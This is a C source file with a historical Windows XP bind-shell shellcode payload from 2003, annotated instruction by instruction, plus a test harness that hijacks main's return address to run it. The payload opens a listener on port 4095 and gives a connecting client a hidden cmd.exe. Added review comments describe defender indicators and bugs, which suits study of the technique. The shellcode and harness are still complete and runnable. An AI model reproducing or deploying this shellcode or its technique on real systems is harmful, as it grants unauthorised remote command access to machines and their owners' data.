// The Dark Raver
// 01/02/2003
// 276 bytes
// - Port: 4095
// - Hardcoded API offsets (Windows XP)
// - Without nulls
// - With ExitThread()
//
// Historical Windows XP bind-shell payload with a C test harness.  Every
// API is reached through an absolute address baked into the bytes (see the
// "call ... = 0x..." comments), so it only runs on the exact ws2_32.dll /
// kernel32.dll builds it was written against; the harness below also relies
// on executing code from a writable data buffer.  For defenders the
// observable behaviour is: WSAStartup -> WSASocket -> bind(0.0.0.0:4095) ->
// listen -> accept, then cmd.exe started with its stdin/stdout/stderr set to
// the accepted socket (a hidden-window child whose standard handles are a
// socket is the classic bind-shell indicator).

// NOTE(review): the header name after #include was lost in extraction
// (presumably <windows.h>/<stdio.h>/<string.h> — confirm against the original).
#include

char hell[]=
// ---- Prologue / initialisation ----
"\x55" /* push %ebp */
"\x89\xe5" /* mov %esp,%ebp */
// NOTE(review): the encoded immediate is 0x1234 (bytes 34 12), not 0x258 as
// the original comment states; either way it just reserves local stack space.
"\x66\x81\xec\x34\x12" /* subw $0x258,%esp */
"\x31\xdb" /* xor %ebx,%ebx */ // ebx stays 0 and is used as the "push 0" register below
// ---- socket + bind + listen + accept ----
// x = 16;
// &x = 0xffffffe4(%ebp)
// (addrlen argument for accept: sizeof(struct sockaddr_in))
"\x89\x5d\xe4" /* mov %ebx,0xffffffe4(%ebp) */
"\xc6\x45\xe4\x10" /* movb $0x10,0xffffffe4(%ebp) */
// WSAStartup(257, &info);
// &info = 0xfffffe68(%ebp)
// 0x101 = requested Winsock version 1.1
"\x8d\x85\x68\xfe\xff\xff" /* lea 0xfffffe68(%ebp),%eax */
"\x50" /* push %eax */
"\x31\xd2" /* xor %edx,%edx */
"\x66\xba\x01\x01" /* mov $0x101,%dx */
"\x52" /* push %edx */
// call WSAStartup = 0x71A341DA
// Absolute ws2_32.dll address (XP-specific); no dynamic import resolution.
"\xb8\xDA\x41\xA3\x71" /* movl $0x71A341DA,%eax */
"\xff\xd0" /* call *%eax */
// hDes=WSASocket(2, 1, 0, 0, 0, 0);
// AF_INET = 2, SOCK_STREAM = 1; the four zero arguments come from ebx.
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x01" /* push $0x1 */
"\x6a\x02" /* push $0x2 */
// call WSASocket = 0x71A35A01
"\xb8\x01\x5A\xA3\x71" /* movl $0x71A35A01,%eax */
"\xff\xd0" /* call *%eax */
// &hDes=0xfffffe60(%ebp)
"\x89\x85\x60\xfe\xff\xff" /* mov %eax,0xfffffe60(%ebp) */
// serv_addr.sin_family = 2;
// &serv_addr = 0xfffffde8(%ebp)
"\x31\xd2" /* xor %edx,%edx */
"\xb2\x02" /* mov $0x2,%dl */
"\x66\x89\x95\xe8\xfd\xff\xff" /* mov %dx,0xfffffde8(%ebp) */
// serv_addr.sin_port = 65295;
// 65295 is the host-order reading of 0xff0f; in memory the bytes are 0f ff,
// i.e. network-order port 0x0fff = 4095, matching the header.
"\x66\xc7\x85\xea\xfd\xff\xff\x0f\xff" /* movw $0xff0f,0xfffffdea(%ebp) */
// serv_addr.sin_addr.s_addr = 0;
// INADDR_ANY: listens on every interface.
"\x89\x9d\xec\xfd\xff\xff" /* mov %ebx,0xfffffdec(%ebp) */
// hSock = bind(hDes, (struct sockaddr *)&serv_addr, 16);
"\x6a\x10" /* push $0x10 */
"\x8d\x85\xe8\xfd\xff\xff" /* lea 0xfffffde8(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */
"\x50" /* push %eax */
// call bind = 0x71A33ECE
"\xb8\xCE\x3E\xA3\x71" /* movl $0x71A33ECE,%eax */
"\xff\xd0" /* call *%eax */
// hSock = listen(hDes, 5);
// No return value of WSAStartup/WSASocket/bind/listen is ever checked.
"\x6a\x05" /* push $0x5 */
"\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */
"\x50" /* push %eax */
// call listen = 0x71A35DE2
"\xb8\xE2\x5D\xA3\x71" /* movl $0x71A35DE2,%eax */
"\xff\xd0" /* call *%eax */
// hSock = accept(hDes, (struct sockaddr *)&serv_addr, &x);
// Blocks until a client connects; the peer address overwrites serv_addr.
"\x8d\x45\xe4" /* lea 0xffffffe4(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\xe8\xfd\xff\xff" /* lea 0xfffffde8(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */
"\x50" /* push %eax */
// call accept = 0x71A3868D
"\xb8\x8D\x86\xA3\x71" /* movl $0x71A3868D,%eax */
"\xff\xd0" /* call *%eax */
// &hSock=0xfffffe64(%ebp)
"\x89\x85\x64\xfe\xff\xff" /* mov %eax,0xfffffe64(%ebp) */
// ---- Launching cmd.exe ----
// memset(&piProcInfo, 0, 16);
// &piProcInfo=0xfffffe48(%ebp)
// NOTE(review): the count loaded into cl is 0x16 = 22 bytes, not 16; the
// fill value is al = bl = 0 and f3 aa is rep stosb.
"\x8d\xbd\x48\xfe\xff\xff" /* lea 0xfffffe48(%ebp),%edi */
"\x88\xd8" /* mov %bl,%al */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x16" /* mov $0x16,%cl */
"\xf3\xaa" /* repz stos */
// memset(&siStartInfo, 0, 68);
// &siStartInfo= 0xfffffdf8(%ebp)
// NOTE(review): likewise cl = 0x68 = 104 bytes, not 68.
"\x8d\xbd\xf8\xfd\xff\xff" /* lea 0xfffffdf8(%ebp),%edi */
"\x88\xd8" /* mov %bl,%al */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x68" /* mov $0x68,%cl */
"\xf3\xaa" /* repz stos */
//siStartInfo.dwFlags = 256 | 1;
//siStartInfo.wShowWindow = 0;
//siStartInfo.hStdOutput = hSock;
//siStartInfo.hStdError = hSock;
//siStartInfo.hStdInput = hSock;
// The offsets (+0x2c dwFlags, +0x30 wShowWindow, +0x38/+0x3c/+0x40 std
// handles, relative to 0xfffffdf8) are consistent with the 32-bit STARTUPINFO
// layout.  0x101 = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW, and
// wShowWindow = 0 hides the console window.  All three standard handles
// are the accepted socket, which is what ties the shell to the connection.
"\x66\xc7\x85\x24\xfe\xff\xff\x01\x01" /* movw $0x101,0xfffffe24(%ebp) */
"\x66\x89\x9d\x28\xfe\xff\xff" /* mov %bx,0xfffffe28(%ebp) */
"\x8b\x85\x64\xfe\xff\xff" /* mov 0xfffffe64(%ebp),%eax */
"\x89\x85\x34\xfe\xff\xff" /* mov %eax,0xfffffe34(%ebp) */
"\x89\x85\x38\xfe\xff\xff" /* mov %eax,0xfffffe38(%ebp) */
"\x89\x85\x30\xfe\xff\xff" /* mov %eax,0xfffffe30(%ebp) */
// CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &siStartInfo, &piProcInfo);
// Arguments are pushed right-to-left; the 1 is bInheritHandles, required for
// the child to receive the socket as its standard handles.
"\x8d\x85\x48\xfe\xff\xff" /* lea 0xfffffe48(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\xf8\xfd\xff\xff" /* lea 0xfffffdf8(%ebp),%eax */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x01" /* push $0x1 */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
// push &cmd.exe
// jmp/call trick: the call's return address is the address of the string,
// so it ends up on the stack as the lpCommandLine argument.  The string is
// not NUL-terminated inside the payload (nulls are avoided), so CreateProcessA
// reads on past "cmd.exe " until the first zero byte after the buffer.
"\xeb\x02" /* jmp +2 */
"\xeb\x0d" /* jmp +13 */
"\xe8\xf9\xff\xff\xff" /* call -7 */
"cmd.exe\x20" /* command string */
"\x53" /* push %ebx */
// call CreateProcessA = 0x77E41BB8
// Absolute kernel32.dll address (XP-specific).
"\xb8\xB8\x1B\xE4\x77" /* movl $0x77E41BB8,%eax */
"\xff\xd0" /* call *%eax */
// call ExitThread = 0x77E53C49
// Terminates only the current thread, leaving the host process alive.
"\xb8\x49\x3C\xE5\x77" /* movl $0x77E53C49,%eax */
"\xff\xd0" /* call *%eax */
"";
// TDR

// Test harness.  Prints strlen(hell) as a sanity check that the payload
// contains no NUL byte (a shorter value than the advertised 276 would mean an
// embedded zero), then overwrites what it assumes is main's saved return
// address so that returning from main jumps into hell[].
// NOTE(review): `(int *)&ret + 2` assumes the compiler places `ret` directly
// below the saved frame pointer — this is undefined behaviour and depends on
// the exact frame layout; it also requires an executable data segment (DEP/NX
// blocks it).  `%d` with a size_t argument is a format-specifier mismatch
// (`%zu` would be correct), and main() falls off the end without a return.
// LoadLibraryA("wsock32.dll") is presumably there so that ws2_32.dll is
// mapped at the base the hardcoded addresses assume — confirm.
int main() { int *ret; LoadLibraryA("wsock32.dll"); printf("%d\n",strlen(hell)); ret = (int *)&ret + 2; (*ret) = (int)hell; }